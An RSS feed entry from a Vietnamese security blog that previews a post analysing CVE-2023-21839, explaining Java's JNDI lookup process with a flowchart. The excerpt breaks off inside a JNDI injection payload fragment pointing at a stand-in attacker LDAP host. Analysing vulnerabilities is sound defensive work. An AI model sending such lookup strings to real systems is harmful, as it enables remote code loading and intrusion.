<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Oracle on shibajutsu</title><link>https://blog.shiba.onl/tags/oracle/</link><description>Recent content in Oracle on shibajutsu</description><generator>Hugo</generator><language>vn</language><copyright>© shibajutsu</copyright><lastBuildDate>Tue, 10 Jun 2025 00:00:00 +0700</lastBuildDate><atom:link href="https://blog.shiba.onl/tags/oracle/index.xml" rel="self" type="application/rss+xml"/><item><title>Phân tích CVE-2023-21839</title><link>https://blog.shiba.onl/posts/cve-2023-21839/</link><pubDate>Tue, 10 Jun 2025 00:00:00 +0700</pubDate><guid>https://blog.shiba.onl/posts/cve-2023-21839/</guid><description>Phân tích CVE-2023-21839 Overview JNDI Java Naming Directory Interface là một API của cho phép các ứng dụng Java tìm kiếm, truy xuất và quản lý các đối tượng hoặc tài nguyên được đăng ký trong một hệ thống danh mục.
Dưới đây là ví dụ quá trình tìm và sử dụng đối tượng/tài nguyên:
flowchart TD A["Khởi tạo Context: new InitialContext()"] --> B["Gọi phương thức lookup()"] B --> C[Kết nối tới dịch vụ Naming/Directory Service] C --> D[Tra cứu đối tượng theo tên] D -- Nếu tìm thấy --> E[Trả về đối tượng] D -- Nếu không tìm thấy --> F[Throw NameNotFoundException] E --> G[Sử dụng đối tượng trong ứng dụng] F --> H[Xử lý lỗi và thông báo] JNDI Injection Là việc kẻ tấn công có thể thao túng quá trình tìm và load đối tượng/tài nguyên (lookup(), ${jndi:ldap://attacker.</description></item></channel></rss>